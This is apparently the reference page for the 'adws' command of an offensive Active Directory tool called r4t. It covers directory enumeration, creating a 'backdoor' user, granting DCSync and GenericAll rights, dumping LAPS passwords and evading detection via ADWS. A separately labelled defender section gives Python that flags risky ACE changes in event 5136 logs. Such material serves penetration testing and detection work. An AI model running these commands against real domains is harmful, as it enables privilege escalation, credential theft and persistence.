adws

Active Directory Web Services (ADWS) operations. ADWS is the transport layer used by PowerShell’s ActiveDirectory module — it communicates over port 9389 using SOAP/NBFS rather than raw LDAP. R4t implements ADWS as a fully-featured alternative to the ldap command.

Usage

r4t adws <subcommand> [flags]

Persistent Flag:

| Flag | Short | Description |
| --- | --- | --- |
| --verify | -V | Verify the operation succeeded by re-reading the modified object |

Subcommands

adws query

Execute an arbitrary LDAP filter query via ADWS.
r4t adws query --filter "(objectClass=user)"

# Return specific attributes
r4t adws query --filter "(&(objectClass=user)(adminCount=1))" --attrs samAccountName,memberOf

# Limit results
r4t adws query --filter "(objectClass=computer)" --attrs name,operatingSystem --max 50

| Flag | Short | Description |
| --- | --- | --- |
| --filter | -F | LDAP filter [required] |
| --attrs | -A | Attributes to return (repeatable) |
| --max | -M | Maximum results (default: 100) |

adws get

Query specific AD object types.
r4t adws get <object-type> [name] [flags]

Object Types

| Type | Argument | Description |
| --- | --- | --- |
| users | | All user accounts |
| computers | | All computer accounts |
| groups | | All security and distribution groups |
| ous | | All Organizational Units |
| maq | | Machine Account Quota |
| passpol | | Domain password policy |
| funclvl | | Domain/forest functional level |
| domain | | Domain information |
| forest | | Forest information |
| dcs | | All domain controllers |
| trusts | | Domain trust relationships |
| user | <samAccountName> | Specific user |
| computer | <samAccountName> | Specific computer |
| group | <samAccountName> | Specific group |
| ou | <name> | Specific OU |
| dn | | Object by DN (--dn required) |
| dacl | <object> | DACL on an object |
| dacls | | DACLs for all high-value objects |
| gplink | <object> | GPO links on a container |
| gplinks | | All GPO links in the domain |

Flags

| Flag | Description |
| --- | --- |
| --attrs | Comma-separated attributes to return |
| --active | Filter to only active/enabled objects (for users, computers) |
| --person | Filter to only person-type users (for users) |
| --no-truncate | Don’t truncate long values (for group) |
| --dn | Distinguished Name to look up (for dn) |
| --resolve | Resolve SID/GUID to names (for dacl, dacls) |
| --as-user | Show effective rights as a specific user (for dacl, dacls) |
| --as-group | Show effective rights as a group member (for dacl, dacls) |

Examples

# Get all users
r4t adws get users

# Get only active users with specific attributes
r4t adws get users --active --attrs samAccountName,memberOf,lastLogon

# Get a specific user
r4t adws get user jsmith

# Get a specific computer
r4t adws get computer WS01$

# Get a group with member list (no truncation)
r4t adws get group "Domain Admins" --no-truncate

# Get all domain controllers
r4t adws get dcs

# Get machine account quota
r4t adws get maq

# Get object by DN
r4t adws get dn --dn "CN=jsmith,CN=Users,DC=corp,DC=example,DC=com"

# Get DACL for an object (with SID resolution)
r4t adws get dacl "CN=Domain Admins,CN=Users,DC=corp,DC=example,DC=com" --resolve

# Get all high-value DACLs
r4t adws get dacls --resolve

# Get GPO links on an OU
r4t adws get gplink "OU=Workstations,DC=corp,DC=example,DC=com"

# Get all GPO links
r4t adws get gplinks

adws create

Create new AD objects.
r4t adws create <object-type> <name> [password] [flags]

| Type | Arguments | Description |
| --- | --- | --- |
| user | <samAccountName> <password> | Create a new user account |
| computer | <hostname> <password> | Create a new computer account |
| group | <samAccountName> | Create a new security group |
| ou | <name> | Create a new Organizational Unit |

| Flag | Description |
| --- | --- |
| --ou | Parent OU DN for the new object (for user, computer, group) |
| --parent | Parent DN for the new OU |

Examples

# Create a user
r4t adws create user backdoor 'P@ssword1' --ou "CN=Users,DC=corp,DC=example,DC=com"

# Create a computer account
r4t adws create computer FAKEPC$ 'RandomPass123!'

# Create a group
r4t adws create group "Evil Admins" --ou "CN=Users,DC=corp,DC=example,DC=com"

# Create an OU
r4t adws create ou "Staging" --parent "DC=corp,DC=example,DC=com"

adws modify

Modify existing AD objects.
r4t adws modify <subcommand> [flags]

| Subcommand | Arguments | Description |
| --- | --- | --- |
| user | <samAccountName> | Modify user attributes |
| computer | <hostname> | Modify computer attributes |
| group | <samAccountName> | Modify group attributes |
| ou | <name> | Modify OU attributes |
| attr | | Modify a specific attribute by DN |
| remove-group-member | <groupName> | Remove a member from a group |
| dacl | <object> | Modify the DACL of an object |
| gplink | <object> | Modify GPO links on a container |

Flags for modify user/computer/group/ou

| Flag | Description |
| --- | --- |
| --attrs | Attributes to set in key=value format [required] |

Flags for modify attr

| Flag | Description |
| --- | --- |
| --dn | DN of the object to modify [required] |
| --attr | Attribute name to modify [required] |
| --value | New value |
| --op | Operation: replace, add, delete |

Flags for modify remove-group-member

| Flag | Description |
| --- | --- |
| --member-dn | DN of the member to remove [required] |

Flags for modify dacl

| Flag | Description |
| --- | --- |
| --trustee | Account to grant/revoke rights to |
| --generic-all | Grant GenericAll |
| --dcsync | Grant DCSync rights (Replicating Directory Changes All) |
| --rbcd | Grant Resource-Based Constrained Delegation rights |
| --shadow-cred | Grant shadow credential write rights |
| --set-owner | Set as owner of the object |
| --restore | Restore original DACL |

Flags for modify gplink

| Flag | Description |
| --- | --- |
| --gpo-guid | GUID of the GPO |
| --link | Create a new GPO link |
| --unlink | Remove a GPO link |
| --enforced | Set the GPO link as enforced |
| --restore | Restore original GPO links |

Examples

# Modify user attributes
r4t adws modify user jsmith --attrs "description=Test account"

# Modify specific attribute by DN
r4t adws modify attr --dn "CN=jsmith,CN=Users,DC=corp,DC=example,DC=com" \
  --attr servicePrincipalName --value "HTTP/app.corp.example.com" --op add

# Remove user from group
r4t adws modify remove-group-member "Domain Admins" \
  --member-dn "CN=jsmith,CN=Users,DC=corp,DC=example,DC=com"

# Grant DCSync rights to a controlled account
r4t adws modify dacl "DC=corp,DC=example,DC=com" --trustee backdoor --dcsync

# Grant GenericAll on a target object
r4t adws modify dacl "CN=jsmith,CN=Users,DC=corp,DC=example,DC=com" \
  --trustee backdoor --generic-all

# Link a GPO to an OU
r4t adws modify gplink "OU=Workstations,DC=corp,DC=example,DC=com" \
  --gpo-guid "{12345678-1234-1234-1234-123456789012}" --link
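
Detection note for defenders, as an added example that is not part of R4t or its documentation: a DACL change that grants DCSync rights or GenericAll is a write to the object's nTSecurityDescriptor, which a domain controller records as Security event 5136 with the new descriptor in SDDL form when directory service change auditing covers the object. The Python sketch below parses that SDDL and reports allow ACEs that give replication rights or full control to an unexpected trustee. The event records, the SID and the expected-trustee list are constructed assumptions.

```python
import re

# Extended-right GUIDs that together permit directory replication (DCSync).
REPL_GUIDS = {"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
              "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All"}
# Assumption: trustees expected to hold such rights (SDDL aliases, SIDs, domain RIDs).
EXPECTED = {"BA", "DA", "EA", "ED", "DD", "RO", "SY", "S-1-5-9", "S-1-5-18", "S-1-5-32-544"}
EXPECTED_RIDS = {"498", "512", "516", "519"}

def has_right(rights, code, bit):
    """True if an SDDL rights field (two-letter codes or a hex mask) includes a right."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & bit)
    return code in {rights[i:i + 2] for i in range(0, len(rights), 2)}

def expected(trustee):
    return trustee in EXPECTED or (
        trustee.startswith("S-1-5-21-") and trustee.rsplit("-", 1)[1] in EXPECTED_RIDS)

def risky_aces(sddl):
    """Return (trustee, reason) for allow ACEs granting replication or full control."""
    findings = []
    for f in (ace.split(";") for ace in re.findall(r"\(([^()]*)\)", sddl)):
        if len(f) < 6 or f[0] not in ("A", "OA") or expected(f[5]):
            continue
        rights, obj, trustee = f[2], f[3].lower(), f[5]
        if has_right(rights, "GA", 0x10000000):
            findings.append((trustee, "GenericAll"))
        elif has_right(rights, "CR", 0x100) and (not obj or obj in REPL_GUIDS):
            findings.append((trustee, REPL_GUIDS.get(obj, "all extended rights")))
    return findings

def review(events):
    """Flag 5136 'value added' writes to nTSecurityDescriptor that add risky ACEs."""
    return [(ev["ObjectDN"], ev["SubjectUserName"], trustee, reason) for ev in events
            if ev["AttributeLDAPDisplayName"].lower() == "ntsecuritydescriptor"
            and ev["OperationType"] == "%%14674"
            for trustee, reason in risky_aces(ev["AttributeValue"])]

# Constructed records shaped like Security event 5136 fields (not real logs).
SID = "S-1-5-21-1111111111-2222222222-3333333333-1602"
EVENTS = [
    {"SubjectUserName": "jsmith", "ObjectDN": "DC=corp,DC=example,DC=com",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14674",
     "AttributeValue": "O:BAG:BAD:AI(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
                       f"(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{SID})(A;;RCRPLCLO;;;AU)"},
    {"SubjectUserName": "jsmith", "ObjectDN": "CN=jsmith,CN=Users,DC=corp,DC=example,DC=com",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674", "AttributeValue": "Test account"},
]
```

Calling review(EVENTS) returns one alert for the constructed SID on the domain object; the Enterprise Domain Controllers ACE and the read-only Authenticated Users ACE are not reported.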

adws delete

Delete AD objects.
r4t adws delete <subcommand>

| Subcommand | Arguments | Description |
| --- | --- | --- |
| dn | | Delete by DN (--dn required) |
| user | <samAccountName> | Delete a user |
| computer | <hostname> | Delete a computer |
| group | <samAccountName> | Delete a group |
| ou | <name> | Delete an OU |

# Delete by DN
r4t adws delete dn --dn "CN=backdoor,CN=Users,DC=corp,DC=example,DC=com"

# Delete user
r4t adws delete user backdoor

# Delete computer
r4t adws delete computer FAKEPC$

adws laps

Interact with LAPS (Local Administrator Password Solution) via ADWS.
r4t adws laps <subcommand> [computer]

| Subcommand | Arguments | Description |
| --- | --- | --- |
| enabled | [computer] | List computers with LAPS enabled (or check a specific one) |
| dump | [computer] | Dump readable LAPS passwords (or for a specific computer) |
| permissions | [computer] | Show principals with LAPS read access |
| set | <computer> <password> | Set the LAPS password for a computer |

# List all LAPS-enabled computers
r4t adws laps enabled

# Dump all LAPS passwords you can read
r4t adws laps dump

# Get LAPS password for a specific computer
r4t adws laps dump WS01

# See who can read LAPS passwords for a specific machine
r4t adws laps permissions WS01

# Set a LAPS password (requires write access)
r4t adws laps set WS01 'NewLAPSpass123!'

ADWS vs LDAP

| Feature | adws | ldap |
| --- | --- | --- |
| Port | 9389 | 389 / 636 |
| Protocol | SOAP over NBFS | Raw LDAP |
| Detection profile | Lower (mimics PowerShell AD module) | Standard LDAP queries |
| Query obfuscation | Via ADWS transport | Via el-dap |
| Coverage | Full parity | Full parity |

Both commands populate the same underlying database tables.